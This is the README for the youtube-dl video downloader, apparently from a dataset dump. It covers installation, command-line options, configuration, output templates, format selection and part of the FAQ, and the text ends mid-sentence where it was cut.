text
stringlengths
9
334k
[![Build Status](https://travis-ci.org/rg3/youtube-dl.svg?branch=master)](https://travis-ci.org/rg3/youtube-dl) youtube-dl - download videos from youtube.com or other video platforms - [INSTALLATION](#installation) - [DESCRIPTION](#description) - [OPTIONS](#options) - [CONFIGURATION](#configuration) - [OUTPUT TEMPLATE](#output-template) - [FORMAT SELECTION](#format-selection) - [VIDEO SELECTION](#video-selection) - [FAQ](#faq) - [DEVELOPER INSTRUCTIONS](#developer-instructions) - [EMBEDDING YOUTUBE-DL](#embedding-youtube-dl) - [BUGS](#bugs) - [COPYRIGHT](#copyright) # INSTALLATION To install it right away for all UNIX users (Linux, macOS, etc.), type: sudo curl -L https://yt-dl.org/downloads/latest/youtube-dl -o /usr/local/bin/youtube-dl sudo chmod a+rx /usr/local/bin/youtube-dl If you do not have curl, you can alternatively use a recent wget: sudo wget https://yt-dl.org/downloads/latest/youtube-dl -O /usr/local/bin/youtube-dl sudo chmod a+rx /usr/local/bin/youtube-dl Windows users can [download an .exe file](https://yt-dl.org/latest/youtube-dl.exe) and place it in any location on their [PATH](https://en.wikipedia.org/wiki/PATH_%28variable%29) except for `%SYSTEMROOT%\System32` (e.g. **do not** put in `C:\Windows\System32`). You can also use pip: sudo -H pip install --upgrade youtube-dl This command will update youtube-dl if you have already installed it. See the [pypi page](https://pypi.python.org/pypi/youtube_dl) for more information. macOS users can install youtube-dl with [Homebrew](https://brew.sh/): brew install youtube-dl Or with [MacPorts](https://www.macports.org/): sudo port install youtube-dl Alternatively, refer to the [developer instructions](#developer-instructions) for how to check out and work with the git repository. For further options, including PGP signatures, see the [youtube-dl Download Page](https://rg3.github.io/youtube-dl/download.html). # DESCRIPTION **youtube-dl** is a command-line program to download videos from YouTube.com and a few more sites. It requires the Python interpreter, version 2.6, 2.7, or 3.2+, and it is not platform specific. It should work on your Unix box, on Windows or on macOS. It is released to the public domain, which means you can modify it, redistribute it or use it however you like. youtube-dl [OPTIONS] URL [URL...] # OPTIONS -h, --help Print this help text and exit --version Print program version and exit -U, --update Update this program to latest version. Make sure that you have sufficient permissions (run with sudo if needed) -i, --ignore-errors Continue on download errors, for example to skip unavailable videos in a playlist --abort-on-error Abort downloading of further videos (in the playlist or the command line) if an error occurs --dump-user-agent Display the current browser identification --list-extractors List all supported extractors --extractor-descriptions Output descriptions of all supported extractors --force-generic-extractor Force extraction to use the generic extractor --default-search PREFIX Use this prefix for unqualified URLs. For example "gvsearch2:" downloads two videos from google videos for youtube-dl "large apple". Use the value "auto" to let youtube-dl guess ("auto_warning" to emit a warning when guessing). "error" just throws an error. The default value "fixup_error" repairs broken URLs, but emits an error if this is not possible instead of searching. --ignore-config Do not read configuration files. When given in the global configuration file /etc/youtube-dl.conf: Do not read the user configuration in ~/.config/youtube- dl/config (%APPDATA%/youtube-dl/config.txt on Windows) --config-location PATH Location of the configuration file; either the path to the config or its containing directory. --flat-playlist Do not extract the videos of a playlist, only list them. --mark-watched Mark videos watched (YouTube only) --no-mark-watched Do not mark videos watched (YouTube only) --no-color Do not emit color codes in output ## Network Options: --proxy URL Use the specified HTTP/HTTPS/SOCKS proxy. To enable SOCKS proxy, specify a proper scheme. For example socks5://127.0.0.1:1080/. Pass in an empty string (--proxy "") for direct connection --socket-timeout SECONDS Time to wait before giving up, in seconds --source-address IP Client-side IP address to bind to -4, --force-ipv4 Make all connections via IPv4 -6, --force-ipv6 Make all connections via IPv6 ## Geo Restriction: --geo-verification-proxy URL Use this proxy to verify the IP address for some geo-restricted sites. The default proxy specified by --proxy (or none, if the option is not present) is used for the actual downloading. --geo-bypass Bypass geographic restriction via faking X-Forwarded-For HTTP header --no-geo-bypass Do not bypass geographic restriction via faking X-Forwarded-For HTTP header --geo-bypass-country CODE Force bypass geographic restriction with explicitly provided two-letter ISO 3166-2 country code --geo-bypass-ip-block IP_BLOCK Force bypass geographic restriction with explicitly provided IP block in CIDR notation ## Video Selection: --playlist-start NUMBER Playlist video to start at (default is 1) --playlist-end NUMBER Playlist video to end at (default is last) --playlist-items ITEM_SPEC Playlist video items to download. Specify indices of the videos in the playlist separated by commas like: "--playlist-items 1,2,5,8" if you want to download videos indexed 1, 2, 5, 8 in the playlist. You can specify range: "--playlist-items 1-3,7,10-13", it will download the videos at index 1, 2, 3, 7, 10, 11, 12 and 13. --match-title REGEX Download only matching titles (regex or caseless sub-string) --reject-title REGEX Skip download for matching titles (regex or caseless sub-string) --max-downloads NUMBER Abort after downloading NUMBER files --min-filesize SIZE Do not download any videos smaller than SIZE (e.g. 50k or 44.6m) --max-filesize SIZE Do not download any videos larger than SIZE (e.g. 50k or 44.6m) --date DATE Download only videos uploaded in this date --datebefore DATE Download only videos uploaded on or before this date (i.e. inclusive) --dateafter DATE Download only videos uploaded on or after this date (i.e. inclusive) --min-views COUNT Do not download any videos with less than COUNT views --max-views COUNT Do not download any videos with more than COUNT views --match-filter FILTER Generic video filter. Specify any key (see the "OUTPUT TEMPLATE" for a list of available keys) to match if the key is present, !key to check if the key is not present, key > NUMBER (like "comment_count > 12", also works with >=, <, <=, !=, =) to compare against a number, key = 'LITERAL' (like "uploader = 'Mike Smith'", also works with !=) to match against a string literal and & to require multiple matches. Values which are not known are excluded unless you put a question mark (?) after the operator. For example, to only match videos that have been liked more than 100 times and disliked less than 50 times (or the dislike functionality is not available at the given service), but who also have a description, use --match-filter "like_count > 100 & dislike_count <? 50 & description" . --no-playlist Download only the video, if the URL refers to a video and a playlist. --yes-playlist Download the playlist, if the URL refers to a video and a playlist. --age-limit YEARS Download only videos suitable for the given age --download-archive FILE Download only videos not listed in the archive file. Record the IDs of all downloaded videos in it. --include-ads Download advertisements as well (experimental) ## Download Options: -r, --limit-rate RATE Maximum download rate in bytes per second (e.g. 50K or 4.2M) -R, --retries RETRIES Number of retries (default is 10), or "infinite". --fragment-retries RETRIES Number of retries for a fragment (default is 10), or "infinite" (DASH, hlsnative and ISM) --skip-unavailable-fragments Skip unavailable fragments (DASH, hlsnative and ISM) --abort-on-unavailable-fragment Abort downloading when some fragment is not available --keep-fragments Keep downloaded fragments on disk after downloading is finished; fragments are erased by default --buffer-size SIZE Size of download buffer (e.g. 1024 or 16K) (default is 1024) --no-resize-buffer Do not automatically adjust the buffer size. By default, the buffer size is automatically resized from an initial value of SIZE. --http-chunk-size SIZE Size of a chunk for chunk-based HTTP downloading (e.g. 10485760 or 10M) (default is disabled). May be useful for bypassing bandwidth throttling imposed by a webserver (experimental) --playlist-reverse Download playlist videos in reverse order --playlist-random Download playlist videos in random order --xattr-set-filesize Set file xattribute ytdl.filesize with expected file size --hls-prefer-native Use the native HLS downloader instead of ffmpeg --hls-prefer-ffmpeg Use ffmpeg instead of the native HLS downloader --hls-use-mpegts Use the mpegts container for HLS videos, allowing to play the video while downloading (some players may not be able to play it) --external-downloader COMMAND Use the specified external downloader. Currently supports aria2c,avconv,axel,curl,ffmpeg,httpie,wget --external-downloader-args ARGS Give these arguments to the external downloader ## Filesystem Options: -a, --batch-file FILE File containing URLs to download ('-' for stdin), one URL per line. Lines starting with '#', ';' or ']' are considered as comments and ignored. --id Use only video ID in file name -o, --output TEMPLATE Output filename template, see the "OUTPUT TEMPLATE" for all the info --autonumber-start NUMBER Specify the start value for %(autonumber)s (default is 1) --restrict-filenames Restrict filenames to only ASCII characters, and avoid "&" and spaces in filenames -w, --no-overwrites Do not overwrite files -c, --continue Force resume of partially downloaded files. By default, youtube-dl will resume downloads if possible. --no-continue Do not resume partially downloaded files (restart from beginning) --no-part Do not use .part files - write directly into output file --no-mtime Do not use the Last-modified header to set the file modification time --write-description Write video description to a .description file --write-info-json Write video metadata to a .info.json file --write-annotations Write video annotations to a .annotations.xml file --load-info-json FILE JSON file containing the video information (created with the "--write-info-json" option) --cookies FILE File to read cookies from and dump cookie jar in --cache-dir DIR Location in the filesystem where youtube-dl can store some downloaded information permanently. By default $XDG_CACHE_HOME/youtube-dl or ~/.cache/youtube-dl . At the moment, only YouTube player files (for videos with obfuscated signatures) are cached, but that may change. --no-cache-dir Disable filesystem caching --rm-cache-dir Delete all filesystem cache files ## Thumbnail images: --write-thumbnail Write thumbnail image to disk --write-all-thumbnails Write all thumbnail image formats to disk --list-thumbnails Simulate and list all available thumbnail formats ## Verbosity / Simulation Options: -q, --quiet Activate quiet mode --no-warnings Ignore warnings -s, --simulate Do not download the video and do not write anything to disk --skip-download Do not download the video -g, --get-url Simulate, quiet but print URL -e, --get-title Simulate, quiet but print title --get-id Simulate, quiet but print id --get-thumbnail Simulate, quiet but print thumbnail URL --get-description Simulate, quiet but print video description --get-duration Simulate, quiet but print video length --get-filename Simulate, quiet but print output filename --get-format Simulate, quiet but print output format -j, --dump-json Simulate, quiet but print JSON information. See the "OUTPUT TEMPLATE" for a description of available keys. -J, --dump-single-json Simulate, quiet but print JSON information for each command-line argument. If the URL refers to a playlist, dump the whole playlist information in a single line. --print-json Be quiet and print the video information as JSON (video is still being downloaded). --newline Output progress bar as new lines --no-progress Do not print progress bar --console-title Display progress in console titlebar -v, --verbose Print various debugging information --dump-pages Print downloaded pages encoded using base64 to debug problems (very verbose) --write-pages Write downloaded intermediary pages to files in the current directory to debug problems --print-traffic Display sent and read HTTP traffic -C, --call-home Contact the youtube-dl server for debugging --no-call-home Do NOT contact the youtube-dl server for debugging ## Workarounds: --encoding ENCODING Force the specified encoding (experimental) --no-check-certificate Suppress HTTPS certificate validation --prefer-insecure Use an unencrypted connection to retrieve information about the video. (Currently supported only for YouTube) --user-agent UA Specify a custom user agent --referer URL Specify a custom referer, use if the video access is restricted to one domain --add-header FIELD:VALUE Specify a custom HTTP header and its value, separated by a colon ':'. You can use this option multiple times --bidi-workaround Work around terminals that lack bidirectional text support. Requires bidiv or fribidi executable in PATH --sleep-interval SECONDS Number of seconds to sleep before each download when used alone or a lower bound of a range for randomized sleep before each download (minimum possible number of seconds to sleep) when used along with --max-sleep-interval. --max-sleep-interval SECONDS Upper bound of a range for randomized sleep before each download (maximum possible number of seconds to sleep). Must only be used along with --min-sleep-interval. ## Video Format Options: -f, --format FORMAT Video format code, see the "FORMAT SELECTION" for all the info --all-formats Download all available video formats --prefer-free-formats Prefer free video formats unless a specific one is requested -F, --list-formats List all available formats of requested videos --youtube-skip-dash-manifest Do not download the DASH manifests and related data on YouTube videos --merge-output-format FORMAT If a merge is required (e.g. bestvideo+bestaudio), output to given container format. One of mkv, mp4, ogg, webm, flv. Ignored if no merge is required ## Subtitle Options: --write-sub Write subtitle file --write-auto-sub Write automatically generated subtitle file (YouTube only) --all-subs Download all the available subtitles of the video --list-subs List all available subtitles for the video --sub-format FORMAT Subtitle format, accepts formats preference, for example: "srt" or "ass/srt/best" --sub-lang LANGS Languages of the subtitles to download (optional) separated by commas, use --list- subs for available language tags ## Authentication Options: -u, --username USERNAME Login with this account ID -p, --password PASSWORD Account password. If this option is left out, youtube-dl will ask interactively. -2, --twofactor TWOFACTOR Two-factor authentication code -n, --netrc Use .netrc authentication data --video-password PASSWORD Video password (vimeo, smotri, youku) ## Adobe Pass Options: --ap-mso MSO Adobe Pass multiple-system operator (TV provider) identifier, use --ap-list-mso for a list of available MSOs --ap-username USERNAME Multiple-system operator account login --ap-password PASSWORD Multiple-system operator account password. If this option is left out, youtube-dl will ask interactively. --ap-list-mso List all supported multiple-system operators ## Post-processing Options: -x, --extract-audio Convert video files to audio-only files (requires ffmpeg or avconv and ffprobe or avprobe) --audio-format FORMAT Specify audio format: "best", "aac", "flac", "mp3", "m4a", "opus", "vorbis", or "wav"; "best" by default; No effect without -x --audio-quality QUALITY Specify ffmpeg/avconv audio quality, insert a value between 0 (better) and 9 (worse) for VBR or a specific bitrate like 128K (default 5) --recode-video FORMAT Encode the video to another format if necessary (currently supported: mp4|flv|ogg|webm|mkv|avi) --postprocessor-args ARGS Give these arguments to the postprocessor -k, --keep-video Keep the video file on disk after the post- processing; the video is erased by default --no-post-overwrites Do not overwrite post-processed files; the post-processed files are overwritten by default --embed-subs Embed subtitles in the video (only for mp4, webm and mkv videos) --embed-thumbnail Embed thumbnail in the audio as cover art --add-metadata Write metadata to the video file --metadata-from-title FORMAT Parse additional metadata like song title / artist from the video title. The format syntax is the same as --output. Regular expression with named capture groups may also be used. The parsed parameters replace existing values. Example: --metadata-from- title "%(artist)s - %(title)s" matches a title like "Coldplay - Paradise". Example (regex): --metadata-from-title "(?P<artist>.+?) - (?P<title>.+)" --xattrs Write metadata to the video file's xattrs (using dublin core and xdg standards) --fixup POLICY Automatically correct known faults of the file. One of never (do nothing), warn (only emit a warning), detect_or_warn (the default; fix file if we can, warn otherwise) --prefer-avconv Prefer avconv over ffmpeg for running the postprocessors --prefer-ffmpeg Prefer ffmpeg over avconv for running the postprocessors (default) --ffmpeg-location PATH Location of the ffmpeg/avconv binary; either the path to the binary or its containing directory. --exec CMD Execute a command on the file after downloading, similar to find's -exec syntax. Example: --exec 'adb push {} /sdcard/Music/ && rm {}' --convert-subs FORMAT Convert the subtitles to other format (currently supported: srt|ass|vtt|lrc) # CONFIGURATION You can configure youtube-dl by placing any supported command line option to a configuration file. On Linux and macOS, the system wide configuration file is located at `/etc/youtube-dl.conf` and the user wide configuration file at `~/.config/youtube-dl/config`. On Windows, the user wide configuration file locations are `%APPDATA%\youtube-dl\config.txt` or `C:\Users\<user name>\youtube-dl.conf`. Note that by default configuration file may not exist so you may need to create it yourself. For example, with the following configuration file youtube-dl will always extract the audio, not copy the mtime, use a proxy and save all videos under `Movies` directory in your home directory: ``` # Lines starting with # are comments # Always extract audio -x # Do not copy the mtime --no-mtime # Use this proxy --proxy 127.0.0.1:3128 # Save all videos under Movies directory in your home directory -o ~/Movies/%(title)s.%(ext)s ``` Note that options in configuration file are just the same options aka switches used in regular command line calls thus there **must be no whitespace** after `-` or `--`, e.g. `-o` or `--proxy` but not `- o` or `-- proxy`. You can use `--ignore-config` if you want to disable the configuration file for a particular youtube-dl run. You can also use `--config-location` if you want to use custom configuration file for a particular youtube-dl run. ### Authentication with `.netrc` file You may also want to configure automatic credentials storage for extractors that support authentication (by providing login and password with `--username` and `--password`) in order not to pass credentials as command line arguments on every youtube-dl execution and prevent tracking plain text passwords in the shell command history. You can achieve this using a [`.netrc` file](https://stackoverflow.com/tags/.netrc/info) on a per extractor basis. For that you will need to create a `.netrc` file in your `$HOME` and restrict permissions to read/write by only you: ``` touch $HOME/.netrc chmod a-rwx,u+rw $HOME/.netrc ``` After that you can add credentials for an extractor in the following format, where *extractor* is the name of the extractor in lowercase: ``` machine <extractor> login <login> password <password> ``` For example: ``` machine youtube login [email protected] password my_youtube_password machine twitch login my_twitch_account_name password my_twitch_password ``` To activate authentication with the `.netrc` file you should pass `--netrc` to youtube-dl or place it in the [configuration file](#configuration). On Windows you may also need to setup the `%HOME%` environment variable manually. For example: ``` set HOME=%USERPROFILE% ``` # OUTPUT TEMPLATE The `-o` option allows users to indicate a template for the output file names. **tl;dr:** [navigate me to examples](#output-template-examples). The basic usage is not to set any template arguments when downloading a single file, like in `youtube-dl -o funny_video.flv "https://some/video"`. However, it may contain special sequences that will be replaced when downloading each video. The special sequences may be formatted according to [python string formatting operations](https://docs.python.org/2/library/stdtypes.html#string-formatting). For example, `%(NAME)s` or `%(NAME)05d`. To clarify, that is a percent symbol followed by a name in parentheses, followed by formatting operations. Allowed names along with sequence type are: - `id` (string): Video identifier - `title` (string): Video title - `url` (string): Video URL - `ext` (string): Video filename extension - `alt_title` (string): A secondary title of the video - `display_id` (string): An alternative identifier for the video - `uploader` (string): Full name of the video uploader - `license` (string): License name the video is licensed under - `creator` (string): The creator of the video - `release_date` (string): The date (YYYYMMDD) when the video was released - `timestamp` (numeric): UNIX timestamp of the moment the video became available - `upload_date` (string): Video upload date (YYYYMMDD) - `uploader_id` (string): Nickname or id of the video uploader - `channel` (string): Full name of the channel the video is uploaded on - `channel_id` (string): Id of the channel - `location` (string): Physical location where the video was filmed - `duration` (numeric): Length of the video in seconds - `view_count` (numeric): How many users have watched the video on the platform - `like_count` (numeric): Number of positive ratings of the video - `dislike_count` (numeric): Number of negative ratings of the video - `repost_count` (numeric): Number of reposts of the video - `average_rating` (numeric): Average rating give by users, the scale used depends on the webpage - `comment_count` (numeric): Number of comments on the video - `age_limit` (numeric): Age restriction for the video (years) - `is_live` (boolean): Whether this video is a live stream or a fixed-length video - `start_time` (numeric): Time in seconds where the reproduction should start, as specified in the URL - `end_time` (numeric): Time in seconds where the reproduction should end, as specified in the URL - `format` (string): A human-readable description of the format - `format_id` (string): Format code specified by `--format` - `format_note` (string): Additional info about the format - `width` (numeric): Width of the video - `height` (numeric): Height of the video - `resolution` (string): Textual description of width and height - `tbr` (numeric): Average bitrate of audio and video in KBit/s - `abr` (numeric): Average audio bitrate in KBit/s - `acodec` (string): Name of the audio codec in use - `asr` (numeric): Audio sampling rate in Hertz - `vbr` (numeric): Average video bitrate in KBit/s - `fps` (numeric): Frame rate - `vcodec` (string): Name of the video codec in use - `container` (string): Name of the container format - `filesize` (numeric): The number of bytes, if known in advance - `filesize_approx` (numeric): An estimate for the number of bytes - `protocol` (string): The protocol that will be used for the actual download - `extractor` (string): Name of the extractor - `extractor_key` (string): Key name of the extractor - `epoch` (numeric): Unix epoch when creating the file - `autonumber` (numeric): Five-digit number that will be increased with each download, starting at zero - `playlist` (string): Name or id of the playlist that contains the video - `playlist_index` (numeric): Index of the video in the playlist padded with leading zeros according to the total length of the playlist - `playlist_id` (string): Playlist identifier - `playlist_title` (string): Playlist title - `playlist_uploader` (string): Full name of the playlist uploader - `playlist_uploader_id` (string): Nickname or id of the playlist uploader Available for the video that belongs to some logical chapter or section: - `chapter` (string): Name or title of the chapter the video belongs to - `chapter_number` (numeric): Number of the chapter the video belongs to - `chapter_id` (string): Id of the chapter the video belongs to Available for the video that is an episode of some series or programme: - `series` (string): Title of the series or programme the video episode belongs to - `season` (string): Title of the season the video episode belongs to - `season_number` (numeric): Number of the season the video episode belongs to - `season_id` (string): Id of the season the video episode belongs to - `episode` (string): Title of the video episode - `episode_number` (numeric): Number of the video episode within a season - `episode_id` (string): Id of the video episode Available for the media that is a track or a part of a music album: - `track` (string): Title of the track - `track_number` (numeric): Number of the track within an album or a disc - `track_id` (string): Id of the track - `artist` (string): Artist(s) of the track - `genre` (string): Genre(s) of the track - `album` (string): Title of the album the track belongs to - `album_type` (string): Type of the album - `album_artist` (string): List of all artists appeared on the album - `disc_number` (numeric): Number of the disc or other physical medium the track belongs to - `release_year` (numeric): Year (YYYY) when the album was released Each aforementioned sequence when referenced in an output template will be replaced by the actual value corresponding to the sequence name. Note that some of the sequences are not guaranteed to be present since they depend on the metadata obtained by a particular extractor. Such sequences will be replaced with `NA`. For example for `-o %(title)s-%(id)s.%(ext)s` and an mp4 video with title `youtube-dl test video` and id `BaW_jenozKcj`, this will result in a `youtube-dl test video-BaW_jenozKcj.mp4` file created in the current directory. For numeric sequences you can use numeric related formatting, for example, `%(view_count)05d` will result in a string with view count padded with zeros up to 5 characters, like in `00042`. Output templates can also contain arbitrary hierarchical path, e.g. `-o '%(playlist)s/%(playlist_index)s - %(title)s.%(ext)s'` which will result in downloading each video in a directory corresponding to this path template. Any missing directory will be automatically created for you. To use percent literals in an output template use `%%`. To output to stdout use `-o -`. The current default template is `%(title)s-%(id)s.%(ext)s`. In some cases, you don't want special characters such as 中, spaces, or &, such as when transferring the downloaded filename to a Windows system or the filename through an 8bit-unsafe channel. In these cases, add the `--restrict-filenames` flag to get a shorter title: #### Output template and Windows batch files If you are using an output template inside a Windows batch file then you must escape plain percent characters (`%`) by doubling, so that `-o "%(title)s-%(id)s.%(ext)s"` should become `-o "%%(title)s-%%(id)s.%%(ext)s"`. However you should not touch `%`'s that are not plain characters, e.g. environment variables for expansion should stay intact: `-o "C:\%HOMEPATH%\Desktop\%%(title)s.%%(ext)s"`. #### Output template examples Note that on Windows you may need to use double quotes instead of single. ```bash $ youtube-dl --get-filename -o '%(title)s.%(ext)s' BaW_jenozKc youtube-dl test video ''_ä↭𝕐.mp4 # All kinds of weird characters $ youtube-dl --get-filename -o '%(title)s.%(ext)s' BaW_jenozKc --restrict-filenames youtube-dl_test_video_.mp4 # A simple file name # Download YouTube playlist videos in separate directory indexed by video order in a playlist $ youtube-dl -o '%(playlist)s/%(playlist_index)s - %(title)s.%(ext)s' https://www.youtube.com/playlist?list=PLwiyx1dc3P2JR9N8gQaQN_BCvlSlap7re # Download all playlists of YouTube channel/user keeping each playlist in separate directory: $ youtube-dl -o '%(uploader)s/%(playlist)s/%(playlist_index)s - %(title)s.%(ext)s' https://www.youtube.com/user/TheLinuxFoundation/playlists # Download Udemy course keeping each chapter in separate directory under MyVideos directory in your home $ youtube-dl -u user -p password -o '~/MyVideos/%(playlist)s/%(chapter_number)s - %(chapter)s/%(title)s.%(ext)s' https://www.udemy.com/java-tutorial/ # Download entire series season keeping each series and each season in separate directory under C:/MyVideos $ youtube-dl -o "C:/MyVideos/%(series)s/%(season_number)s - %(season)s/%(episode_number)s - %(episode)s.%(ext)s" https://videomore.ru/kino_v_detalayah/5_sezon/367617 # Stream the video being downloaded to stdout $ youtube-dl -o - BaW_jenozKc ``` # FORMAT SELECTION By default youtube-dl tries to download the best available quality, i.e. if you want the best quality you **don't need** to pass any special options, youtube-dl will guess it for you by **default**. But sometimes you may want to download in a different format, for example when you are on a slow or intermittent connection. The key mechanism for achieving this is so-called *format selection* based on which you can explicitly specify desired format, select formats based on some criterion or criteria, setup precedence and much more. The general syntax for format selection is `--format FORMAT` or shorter `-f FORMAT` where `FORMAT` is a *selector expression*, i.e. an expression that describes format or formats you would like to download. **tl;dr:** [navigate me to examples](#format-selection-examples). The simplest case is requesting a specific format, for example with `-f 22` you can download the format with format code equal to 22. You can get the list of available format codes for particular video using `--list-formats` or `-F`. Note that these format codes are extractor specific. You can also use a file extension (currently `3gp`, `aac`, `flv`, `m4a`, `mp3`, `mp4`, `ogg`, `wav`, `webm` are supported) to download the best quality format of a particular file extension served as a single file, e.g. `-f webm` will download the best quality format with the `webm` extension served as a single file. You can also use special names to select particular edge case formats: - `best`: Select the best quality format represented by a single file with video and audio. - `worst`: Select the worst quality format represented by a single file with video and audio. - `bestvideo`: Select the best quality video-only format (e.g. DASH video). May not be available. - `worstvideo`: Select the worst quality video-only format. May not be available. - `bestaudio`: Select the best quality audio only-format. May not be available. - `worstaudio`: Select the worst quality audio only-format. May not be available. For example, to download the worst quality video-only format you can use `-f worstvideo`. If you want to download multiple videos and they don't have the same formats available, you can specify the order of preference using slashes. Note that slash is left-associative, i.e. formats on the left hand side are preferred, for example `-f 22/17/18` will download format 22 if it's available, otherwise it will download format 17 if it's available, otherwise it will download format 18 if it's available, otherwise it will complain that no suitable formats are available for download. If you want to download several formats of the same video use a comma as a separator, e.g. `-f 22,17,18` will download all these three formats, of course if they are available. Or a more sophisticated example combined with the precedence feature: `-f 136/137/mp4/bestvideo,140/m4a/bestaudio`. You can also filter the video formats by putting a condition in brackets, as in `-f "best[height=720]"` (or `-f "[filesize>10M]"`). The following numeric meta fields can be used with comparisons `<`, `<=`, `>`, `>=`, `=` (equals), `!=` (not equals): - `filesize`: The number of bytes, if known in advance - `width`: Width of the video, if known - `height`: Height of the video, if known - `tbr`: Average bitrate of audio and video in KBit/s - `abr`: Average audio bitrate in KBit/s - `vbr`: Average video bitrate in KBit/s - `asr`: Audio sampling rate in Hertz - `fps`: Frame rate Also filtering work for comparisons `=` (equals), `^=` (starts with), `$=` (ends with), `*=` (contains) and following string meta fields: - `ext`: File extension - `acodec`: Name of the audio codec in use - `vcodec`: Name of the video codec in use - `container`: Name of the container format - `protocol`: The protocol that will be used for the actual download, lower-case (`http`, `https`, `rtsp`, `rtmp`, `rtmpe`, `mms`, `f4m`, `ism`, `http_dash_segments`, `m3u8`, or `m3u8_native`) - `format_id`: A short description of the format Any string comparison may be prefixed with negation `!` in order to produce an opposite comparison, e.g. `!*=` (does not contain). Note that none of the aforementioned meta fields are guaranteed to be present since this solely depends on the metadata obtained by particular extractor, i.e. the metadata offered by the video hoster. Formats for which the value is not known are excluded unless you put a question mark (`?`) after the operator. You can combine format filters, so `-f "[height <=? 720][tbr>500]"` selects up to 720p videos (or videos where the height is not known) with a bitrate of at least 500 KBit/s. You can merge the video and audio of two formats into a single file using `-f <video-format>+<audio-format>` (requires ffmpeg or avconv installed), for example `-f bestvideo+bestaudio` will download the best video-only format, the best audio-only format and mux them together with ffmpeg/avconv. Format selectors can also be grouped using parentheses, for example if you want to download the best mp4 and webm formats with a height lower than 480 you can use `-f '(mp4,webm)[height<480]'`. Since the end of April 2015 and version 2015.04.26, youtube-dl uses `-f bestvideo+bestaudio/best` as the default format selection (see [#5447](https://github.com/rg3/youtube-dl/issues/5447), [#5456](https://github.com/rg3/youtube-dl/issues/5456)). If ffmpeg or avconv are installed this results in downloading `bestvideo` and `bestaudio` separately and muxing them together into a single file giving the best overall quality available. Otherwise it falls back to `best` and results in downloading the best available quality served as a single file. `best` is also needed for videos that don't come from YouTube because they don't provide the audio and video in two different files. If you want to only download some DASH formats (for example if you are not interested in getting videos with a resolution higher than 1080p), you can add `-f bestvideo[height<=?1080]+bestaudio/best` to your configuration file. Note that if you use youtube-dl to stream to `stdout` (and most likely to pipe it to your media player then), i.e. you explicitly specify output template as `-o -`, youtube-dl still uses `-f best` format selection in order to start content delivery immediately to your player and not to wait until `bestvideo` and `bestaudio` are downloaded and muxed. If you want to preserve the old format selection behavior (prior to youtube-dl 2015.04.26), i.e. you want to download the best available quality media served as a single file, you should explicitly specify your choice with `-f best`. You may want to add it to the [configuration file](#configuration) in order not to type it every time you run youtube-dl. #### Format selection examples Note that on Windows you may need to use double quotes instead of single. ```bash # Download best mp4 format available or any other best if no mp4 available $ youtube-dl -f 'bestvideo[ext=mp4]+bestaudio[ext=m4a]/best[ext=mp4]/best' # Download best format available but not better that 480p $ youtube-dl -f 'bestvideo[height<=480]+bestaudio/best[height<=480]' # Download best video only format but no bigger than 50 MB $ youtube-dl -f 'best[filesize<50M]' # Download best format available via direct link over HTTP/HTTPS protocol $ youtube-dl -f '(bestvideo+bestaudio/best)[protocol^=http]' # Download the best video format and the best audio format without merging them $ youtube-dl -f 'bestvideo,bestaudio' -o '%(title)s.f%(format_id)s.%(ext)s' ``` Note that in the last example, an output template is recommended as bestvideo and bestaudio may have the same file name. # VIDEO SELECTION Videos can be filtered by their upload date using the options `--date`, `--datebefore` or `--dateafter`. They accept dates in two formats: - Absolute dates: Dates in the format `YYYYMMDD`. - Relative dates: Dates in the format `(now|today)[+-][0-9](day|week|month|year)(s)?` Examples: ```bash # Download only the videos uploaded in the last 6 months $ youtube-dl --dateafter now-6months # Download only the videos uploaded on January 1, 1970 $ youtube-dl --date 19700101 $ # Download only the videos uploaded in the 200x decade $ youtube-dl --dateafter 20000101 --datebefore 20091231 ``` # FAQ ### How do I update youtube-dl? If you've followed [our manual installation instructions](https://rg3.github.io/youtube-dl/download.html), you can simply run `youtube-dl -U` (or, on Linux, `sudo youtube-dl -U`). If you have used pip, a simple `sudo pip install -U youtube-dl` is sufficient to update. If you have installed youtube-dl using a package manager like *apt-get* or *yum*, use the standard system update mechanism to update. Note that distribution packages are often outdated. As a rule of thumb, youtube-dl releases at least once a month, and often weekly or even daily. Simply go to https://yt-dl.org to find out the current version. Unfortunately, there is nothing we youtube-dl developers can do if your distribution serves a really outdated version. You can (and should) complain to your distribution in their bugtracker or support forum. As a last resort, you can also uninstall the version installed by your package manager and follow our manual installation instructions. For that, remove the distribution's package, with a line like sudo apt-get remove -y youtube-dl Afterwards, simply follow [our manual installation instructions](https://rg3.github.io/youtube-dl/download.html): ``` sudo wget https://yt-dl.org/latest/youtube-dl -O /usr/local/bin/youtube-dl sudo chmod a+x /usr/local/bin/youtube-dl hash -r ``` Again, from then on you'll be able to update with `sudo youtube-dl -U`. ### youtube-dl is extremely slow to start on Windows Add a file exclusion for `youtube-dl.exe` in Windows Defender settings. ### I'm getting an error `Unable to extract OpenGraph title` on YouTube playlists YouTube changed their playlist format in March 2014 and later on, so you'll need at least youtube-dl 2014.07.25 to download all YouTube videos. If you have installed youtube-dl with a package manager, pip, setup.py or a tarball, please use that to update. Note that Ubuntu packages do not seem to get updated anymore. Since we are not affiliated with Ubuntu, there is little we can do. Feel free to [report bugs](https://bugs.launchpad.net/ubuntu/+source/youtube-dl/+filebug) to the [Ubuntu packaging people](mailto:[email protected]?subject=outdated%20version%20of%20youtube-dl) - all they have to do is update the package to a somewhat recent version. See above for a way to update. ### I'm getting an error when trying to use output template: `error: using output template conflicts with using title, video ID or auto number` Make sure you are not using `-o` with any of these options `-t`, `--title`, `--id`, `-A` or `--auto-number` set in command line or in a configuration file. Remove the latter if any. ### Do I always have to pass `-citw`? By default, youtube-dl intends to have the best options (incidentally, if you have a convincing case that these should be different, [please file an issue where you explain that](https://yt-dl.org/bug)). Therefore, it is unnecessary and sometimes harmful to copy long option strings from webpages. In particular, the only option out of `-citw` that is regularly useful is `-i`. ### Can you please put the `-b` option back? Most people asking this question are not aware that youtube-dl now defaults to downloading the highest available quality as reported by YouTube, which will be 1080p or 720p in some cases, so you no longer need the `-b` option. For some specific videos, maybe YouTube does not report them to be available in a specific high quality format you're interested in. In that case, simply request it with the `-f` option and youtube-dl will try to download it. ### I get HTTP error 402 when trying to download a video. What's this? Apparently YouTube requires you to pass a CAPTCHA test if you download too much. We're [considering to provide a way to let you solve the CAPTCHA](https://github.com/rg3/youtube-dl/issues/154), but at the moment, your best course of action is pointing a web browser to the youtube URL, solving the CAPTCHA, and restart youtube-dl. ### Do I need any other programs? youtube-dl works fine on its own on most sites. However, if you want to convert video/audio, you'll need [avconv](https://libav.org/) or 